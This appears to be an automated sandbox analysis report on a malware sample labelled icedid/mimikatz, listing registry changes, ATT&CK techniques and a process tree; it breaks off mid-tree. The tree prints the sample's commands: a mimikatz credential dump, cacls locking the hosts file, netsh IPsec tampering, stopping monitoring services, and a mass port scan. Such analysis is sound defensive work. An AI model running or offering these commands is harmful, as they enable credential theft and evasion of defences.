Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ttsqkuccf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ncgcflyve.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnreyic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gykgue.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnreyic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2352	cmd.exe
3936	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023cb1-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023cc5-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023cc5-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cntrtrctt.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	pnreyic.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3936	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2676	schtasks.exe
2252	schtasks.exe
348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	372	pnreyic.exe
Token: SeDebugPrivilege	3632	pnreyic.exe
Token: SeDebugPrivilege	2424	vfshost.exe
Token: SeDebugPrivilege	4144	cntrtrctt.exe
Token: SeLockMemoryPrivilege	1908	zergmt.exe
Token: SeLockMemoryPrivilege	1908	zergmt.exe
Token: SeDebugPrivilege	2488	cntrtrctt.exe
Token: SeDebugPrivilege	524	cntrtrctt.exe
Token: SeDebugPrivilege	3288	cntrtrctt.exe
Token: SeDebugPrivilege	4792	cntrtrctt.exe
Token: SeDebugPrivilege	728	cntrtrctt.exe
Token: SeDebugPrivilege	1252	cntrtrctt.exe
Token: SeDebugPrivilege	3284	cntrtrctt.exe
Token: SeDebugPrivilege	3044	cntrtrctt.exe
Token: SeDebugPrivilege	4060	cntrtrctt.exe
Token: SeDebugPrivilege	312	cntrtrctt.exe
Token: SeDebugPrivilege	4508	cntrtrctt.exe
Token: SeDebugPrivilege	3972	cntrtrctt.exe
Token: SeDebugPrivilege	3276	cntrtrctt.exe
Token: SeDebugPrivilege	3300	cntrtrctt.exe
Token: SeDebugPrivilege	1264	cntrtrctt.exe
Token: SeDebugPrivilege	3732	cntrtrctt.exe
Token: SeDebugPrivilege	3644	cntrtrctt.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
372	pnreyic.exe
372	pnreyic.exe
3632	pnreyic.exe
3632	pnreyic.exe
4948	xohudmc.exe
3836	gykgue.exe
2968	pnreyic.exe
2968	pnreyic.exe
5516	pnreyic.exe
5516	pnreyic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 2352	1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe	84
PID 1752 wrote to memory of 2352	1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe	84
PID 1752 wrote to memory of 2352	1752	2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe	84
PID 2352 wrote to memory of 3936	2352	cmd.exe	86
PID 2352 wrote to memory of 3936	2352	cmd.exe	86
PID 2352 wrote to memory of 3936	2352	cmd.exe	86
PID 2352 wrote to memory of 372	2352	cmd.exe	94
PID 2352 wrote to memory of 372	2352	cmd.exe	94
PID 2352 wrote to memory of 372	2352	cmd.exe	94
PID 3632 wrote to memory of 1416	3632	pnreyic.exe	96
PID 3632 wrote to memory of 1416	3632	pnreyic.exe	96
PID 3632 wrote to memory of 1416	3632	pnreyic.exe	96
PID 1416 wrote to memory of 4768	1416	cmd.exe	98
PID 1416 wrote to memory of 4768	1416	cmd.exe	98
PID 1416 wrote to memory of 4768	1416	cmd.exe	98
PID 1416 wrote to memory of 2960	1416	cmd.exe	99
PID 1416 wrote to memory of 2960	1416	cmd.exe	99
PID 1416 wrote to memory of 2960	1416	cmd.exe	99
PID 1416 wrote to memory of 2948	1416	cmd.exe	100
PID 1416 wrote to memory of 2948	1416	cmd.exe	100
PID 1416 wrote to memory of 2948	1416	cmd.exe	100
PID 1416 wrote to memory of 3200	1416	cmd.exe	101
PID 1416 wrote to memory of 3200	1416	cmd.exe	101
PID 1416 wrote to memory of 3200	1416	cmd.exe	101
PID 1416 wrote to memory of 5024	1416	cmd.exe	102
PID 1416 wrote to memory of 5024	1416	cmd.exe	102
PID 1416 wrote to memory of 5024	1416	cmd.exe	102
PID 1416 wrote to memory of 5044	1416	cmd.exe	103
PID 1416 wrote to memory of 5044	1416	cmd.exe	103
PID 1416 wrote to memory of 5044	1416	cmd.exe	103
PID 3632 wrote to memory of 1376	3632	pnreyic.exe	111
PID 3632 wrote to memory of 1376	3632	pnreyic.exe	111
PID 3632 wrote to memory of 1376	3632	pnreyic.exe	111
PID 3632 wrote to memory of 2104	3632	pnreyic.exe	113
PID 3632 wrote to memory of 2104	3632	pnreyic.exe	113
PID 3632 wrote to memory of 2104	3632	pnreyic.exe	113
PID 3632 wrote to memory of 2012	3632	pnreyic.exe	115
PID 3632 wrote to memory of 2012	3632	pnreyic.exe	115
PID 3632 wrote to memory of 2012	3632	pnreyic.exe	115
PID 3632 wrote to memory of 1000	3632	pnreyic.exe	117
PID 3632 wrote to memory of 1000	3632	pnreyic.exe	117
PID 3632 wrote to memory of 1000	3632	pnreyic.exe	117
PID 1000 wrote to memory of 4580	1000	cmd.exe	119
PID 1000 wrote to memory of 4580	1000	cmd.exe	119
PID 1000 wrote to memory of 4580	1000	cmd.exe	119
PID 4580 wrote to memory of 348	4580	wpcap.exe	120
PID 4580 wrote to memory of 348	4580	wpcap.exe	120
PID 4580 wrote to memory of 348	4580	wpcap.exe	120
PID 348 wrote to memory of 1248	348	net.exe	122
PID 348 wrote to memory of 1248	348	net.exe	122
PID 348 wrote to memory of 1248	348	net.exe	122
PID 4580 wrote to memory of 1132	4580	wpcap.exe	123
PID 4580 wrote to memory of 1132	4580	wpcap.exe	123
PID 4580 wrote to memory of 1132	4580	wpcap.exe	123
PID 1132 wrote to memory of 2712	1132	net.exe	125
PID 1132 wrote to memory of 2712	1132	net.exe	125
PID 1132 wrote to memory of 2712	1132	net.exe	125
PID 4580 wrote to memory of 2016	4580	wpcap.exe	126
PID 4580 wrote to memory of 2016	4580	wpcap.exe	126
PID 4580 wrote to memory of 2016	4580	wpcap.exe	126
PID 2016 wrote to memory of 4032	2016	net.exe	128
PID 2016 wrote to memory of 4032	2016	net.exe	128
PID 2016 wrote to memory of 4032	2016	net.exe	128
PID 4580 wrote to memory of 2508	4580	wpcap.exe	129

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140
- C:\Windows\TEMP\gcettrccj\zergmt.exe
  "C:\Windows\TEMP\gcettrccj\zergmt.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1908

C:\Users\Admin\AppData\Local\Temp\2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-27_70fc9e9c8c26a53ec2c191120956ea0d_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3936
- - C:\Windows\hrmeszcf\pnreyic.exe
    C:\Windows\hrmeszcf\pnreyic.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:372

C:\Windows\hrmeszcf\pnreyic.exe
C:\Windows\hrmeszcf\pnreyic.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4768
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2948
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5024
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5044
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1376
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2104
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\nblmptktz\etgfqftjv\wpcap.exe
    C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1248
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:2712
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2016
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4032
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2508
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3260
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3200
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:5024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1560
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:2860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4784
- - C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe
    C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:3264
- - C:\Windows\nblmptktz\Corporate\vfshost.exe
    C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
